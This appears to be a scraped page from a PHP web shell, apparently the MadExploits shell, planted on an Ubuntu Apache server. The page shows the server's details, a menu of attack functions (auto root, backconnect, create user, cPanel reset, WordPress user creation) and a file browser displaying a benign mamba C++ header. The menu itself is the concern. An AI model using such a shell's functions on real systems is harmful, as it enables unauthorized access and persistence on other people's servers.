Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
miniconda3 /
python /
include /
mamba /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
activation.hpp
6.56
KB
-rw-rw-r--
channel.hpp
4.44
KB
-rw-rw-r--
common_types.hpp
440
B
-rw-rw-r--
context.hpp
7.78
KB
-rw-rw-r--
download.hpp
3.03
KB
-rw-rw-r--
env_lockfile.hpp
3.63
KB
-rw-rw-r--
environment.hpp
1.48
KB
-rw-rw-r--
environments_manager.hpp
997
B
-rw-rw-r--
error_handling.hpp
9.42
KB
-rw-rw-r--
execution.hpp
5.8
KB
-rw-rw-r--
fetch.hpp
4.99
KB
-rw-rw-r--
fsutil.hpp
1.52
KB
-rw-rw-r--
history.hpp
1.54
KB
-rw-rw-r--
invoke.hpp
1.38
KB
-rw-rw-r--
link.hpp
2.96
KB
-rw-rw-r--
mamba_fs.hpp
44.93
KB
-rw-rw-r--
match_spec.hpp
1.28
KB
-rw-rw-r--
menuinst.hpp
366
B
-rw-rw-r--
output.hpp
5.24
KB
-rw-rw-r--
package_cache.hpp
2.01
KB
-rw-rw-r--
package_download.hpp
2.39
KB
-rw-rw-r--
package_handling.hpp
1.57
KB
-rw-rw-r--
package_info.hpp
2.08
KB
-rw-rw-r--
package_paths.hpp
1.67
KB
-rw-rw-r--
palette.hpp
2.84
KB
-rw-rw-r--
pinning.hpp
514
B
-rw-rw-r--
pool.hpp
2.52
KB
-rw-rw-r--
prefix_data.hpp
1.33
KB
-rw-rw-r--
progress_bar.hpp
3.01
KB
-rw-rw-r--
query.hpp
2.91
KB
-rw-rw-r--
repo.hpp
3.03
KB
-rw-rw-r--
run.hpp
1.54
KB
-rw-rw-r--
satisfiability_error.hpp
10.66
KB
-rw-rw-r--
shell_init.hpp
2.5
KB
-rw-rw-r--
solution.hpp
6.21
KB
-rw-rw-r--
solver.hpp
4.25
KB
-rw-rw-r--
subdirdata.hpp
5.07
KB
-rw-rw-r--
tasksync.hpp
7.51
KB
-rw-rw-r--
thread_utils.hpp
5.39
KB
-rw-rw-r--
timeref.hpp
595
B
-rw-rw-r--
transaction.hpp
2.88
KB
-rw-rw-r--
transaction_context.hpp
2.51
KB
-rw-rw-r--
util.hpp
12.26
KB
-rw-rw-r--
util_os.hpp
1.71
KB
-rw-rw-r--
util_random.hpp
1.93
KB
-rw-rw-r--
util_scope.hpp
1.04
KB
-rw-rw-r--
validate.hpp
22.59
KB
-rw-rw-r--
virtual_packages.hpp
777
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : transaction_context.hpp
// Copyright (c) 2019, QuantStack and Mamba Contributors // // Distributed under the terms of the BSD 3-Clause License. // // The full license is in the file LICENSE, distributed with this software. #ifndef MAMBA_CORE_TRANSACTION_CONTEXT #define MAMBA_CORE_TRANSACTION_CONTEXT #include <string> #include <reproc++/reproc.hpp> #include "context.hpp" #include "mamba_fs.hpp" #include "match_spec.hpp" #include "util.hpp" namespace mamba { std::string compute_short_python_version(const std::string& long_version); // supply short python version, e.g. 2.7, 3.5... fs::u8path get_python_short_path(const std::string& python_version); fs::u8path get_python_site_packages_short_path(const std::string& python_version); fs::u8path get_bin_directory_short_path(); fs::u8path get_python_noarch_target_path( const std::string& source_short_path, const fs::u8path& target_site_packages_short_path ); class TransactionContext { public: TransactionContext(); TransactionContext& operator=(const TransactionContext&); TransactionContext( const fs::u8path& target_prefix, const std::pair<std::string, std::string>& py_versions, const std::vector<MatchSpec>& requested_specs ); TransactionContext( const fs::u8path& target_prefix, const fs::u8path& relocate_prefix, const std::pair<std::string, std::string>& py_versions, const std::vector<MatchSpec>& requested_specs ); ~TransactionContext(); bool try_pyc_compilation(const std::vector<fs::u8path>& py_files); void wait_for_pyc_compilation(); bool has_python; fs::u8path target_prefix; fs::u8path relocate_prefix; fs::u8path site_packages_path; fs::u8path python_path; std::string python_version; std::string old_python_version; std::string short_python_version; bool allow_softlinks = false; bool always_copy = false; bool always_softlink = false; bool compile_pyc = true; // this needs to be done when python version changes bool relink_noarch = false; std::vector<MatchSpec> requested_specs; private: bool start_pyc_compilation_process(); std::unique_ptr<reproc::process> m_pyc_process = nullptr; std::unique_ptr<TemporaryFile> m_pyc_script_file = nullptr; std::unique_ptr<TemporaryFile> m_pyc_compileall = nullptr; }; } // namespace mamba #endif
Close